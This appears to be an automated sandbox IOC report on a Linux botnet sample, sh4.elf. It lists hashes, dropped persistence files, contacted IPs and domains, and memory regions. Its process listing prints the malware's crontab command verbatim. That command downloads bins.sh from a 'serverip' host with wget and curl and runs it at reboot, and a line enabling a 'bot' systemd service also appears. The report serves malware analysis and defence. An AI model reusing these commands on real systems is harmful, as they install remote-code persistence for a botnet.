Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

sh4.elf

ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Entropy:	6.865595055633762
Filename:	sh4.elf
Filesize:	67400
MD5:	16fb41b9eb62b0706fd7824ae6eb8d8d
SHA1:	7c99313b0e075431d9b3ee50ecb7f1997ec2cb24
SHA256:	3089adf47259ddf51c16169c6abdd428e30f1a43fe129f56b416977652bfe84a
SHA512:	032511c4dbe38e0b1345186900ad3b2e9a286edde415e13ec3bc2b4717e6566c9f730bbfa84c34c5a5ba09a525c552d1911b4f814840d10f79863431311c85e3
SSDEEP:	1536:XTusaMwtrtW+bhFQ5JOdUnHKvH71PUjxCVVLw/o:Djr4Wgh56nqvJUjx9/o
Preview:	.ELF.....................@.4...........4. ...(...............@...@...........................A...A......f..........Q.td............................././"O.n........#.@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading
Sample listens on a socket	Networking
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion	Security Software Discovery
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion

/root/.bashrc

ASCII text

dropped

Details

File:	/root/.bashrc
Category:	dropped
Dump:	.bashrc.13.dr
ID:	dr_0
Target ID:	13
Process:	/tmp/sh4.elf
Type:	ASCII text
Entropy:	4.358630015292201
Encrypted:	false
Ssdeep:	3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
Size:	178
Whitelisted:	false
Reputation:	moderate

Signature Hits	Behavior Group	Mitre Attack
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions	Persistence and Installation Behavior	Unix Shell Configuration Modification
Creates hidden files and/or directories	Persistence and Installation Behavior	Hidden Files and Directories

/var/spool/cron/crontabs/tmp.xheE4S

ASCII text

dropped

Details

File:	/var/spool/cron/crontabs/tmp.xheE4S
Category:	dropped
Dump:	tmp.xheE4S.22.dr
ID:	dr_2
Target ID:	22
Process:	/usr/bin/crontab
Type:	ASCII text
Entropy:	5.096705576725245
Encrypted:	false
Ssdeep:	6:SUrpqoqQjEOP1KmREJOBFQLv5UZHGMQ5UYLtCFt3HY8jsHB:8QjHig898eHLUHY8mB
Size:	235
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior

/memfd:snapd-env-generator (deleted)

ASCII text

dropped

Details

File:	/memfd:snapd-env-generator (deleted)
Category:	dropped
Dump:	memfd_snapd-env-generator (deleted).38.dr
ID:	dr_3
Target ID:	38
Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Type:	ASCII text
Entropy:	3.7627880354948586
Encrypted:	false
Ssdeep:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
Size:	76
Whitelisted:	false
Reputation:	moderate

/usr/lib/systemd/system/bot.service

ASCII text

dropped

Details

File:	/usr/lib/systemd/system/bot.service
Category:	dropped
Dump:	bot.service.13.dr
ID:	dr_1
Target ID:	13
Process:	/tmp/sh4.elf
Type:	ASCII text
Entropy:	4.9110117370593995
Encrypted:	false
Ssdeep:	6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
Size:	356
Whitelisted:	false
Reputation:	moderate

Processes

Path

Cmdline

Malicious

/tmp/sh4.elf

/bin/sh

sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"

/bin/sh

/usr/bin/crontab

crontab -l

/bin/sh

/usr/bin/chmod

chmod +x bins.sh

/bin/sh

/usr/bin/sh

sh bins.sh

/bin/sh

/bin/curl

/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh

/bin/sh

/usr/bin/chmod

chmod +x bins.sh

/usr/bin/sh

sh bins.sh

/bin/sh

/usr/bin/crontab

crontab -

/tmp/sh4.elf

/bin/sh

sh -c "/bin/systemctl enable bot"

/bin/sh

/bin/systemctl

/bin/systemctl enable bot

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.8toPOS4Sx6 /tmp/tmp.TDNJw6NW71 /tmp/tmp.jhngWstQm0

There are 21 hidden processes, click here to show them.

URLs

Name

Malicious

http://serverip/bins/bins.sh

unknown

Details

Name:	http://serverip/bins/bins.sh
TargetID:	22
From Memory:	true
Current Path:	/usr/bin/crontab
Source:	tmp.xheE4S.22.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

http://serverip/bins/bins.sh;

unknown

Details

Name:	http://serverip/bins/bins.sh;
TargetID:	13
From Memory:	true
Current Path:	/tmp/sh4.elf
Source:	bot.service.13.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
URLs found in memory or binary data	Networking

Domains

Name

Malicious

host.zopz-api.com

172.111.38.48

Details

Name:	host.zopz-api.com
IP:	172.111.38.48
TargetID:	-1
Active:	true
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

34.249.145.219

unknown

United States

Details

IP:	34.249.145.219
TargetID:	-1
Country:	United States
Countrycode:	USA
ASN number:	16509
ASN name:	AMAZON-02US
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

172.111.38.48

host.zopz-api.com

Reserved

109.202.202.202

unknown

Switzerland

Details

IP:	109.202.202.202
TargetID:	-1
Country:	Switzerland
Countrycode:	CHE
ASN number:	13030
ASN name:	INIT7CH
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.42

unknown

United Kingdom

Details

IP:	91.189.91.42
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

7f4fabded000

page read and write

55f22130a000

page execute read

55f22353d000

page read and write

7f4fac8d7000

page read and write

7f4fac924000

page read and write

7f4fa4000000

page read and write

7f4fac8df000

page read and write

7f4f24410000

page execute read

7f4fab5dc000

page read and write

7f4fac43e000

page read and write

7f4fac7ae000

page read and write

7f4fac43e000

page read and write

7f4f24427000

page read and write

55f221528000

page read and write

7fff46832000

page read and write

7f4f24420000

page read and write

7f4fac8d7000

page read and write

7fff4691c000

page execute read

55f2248f0000

page read and write

7fff4691c000

page execute read

55f221528000

page read and write

55f2248d0000

page read and write

7f4f24420000

page read and write

7f4fabded000

page read and write

7f4fa4021000

page read and write

7f4fabddf000

page read and write

7f4fac07c000

page read and write

55f221520000

page read and write

7f4fa4021000

page read and write

7f4fac924000

page read and write

7f4fac8df000

page read and write

7f4fac07c000

page read and write

7f4fac7ae000

page read and write

7f4fac463000

page read and write

55f221520000

page read and write

55f223526000

page execute and read and write

55f2248d0000

page read and write

7f4f24429000

page read and write

7f4fabddf000

page read and write

55f223526000

page execute and read and write

7f4f24427000

page read and write

7f4fac463000

page read and write

7f4fa4000000

page read and write

7fff46832000

page read and write

7f4f24410000

page execute read

55f22130a000

page execute read

7f4fab5dc000

page read and write

55f22353d000

page read and write

There are 38 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
sh4.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportsh4.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
sh4.elf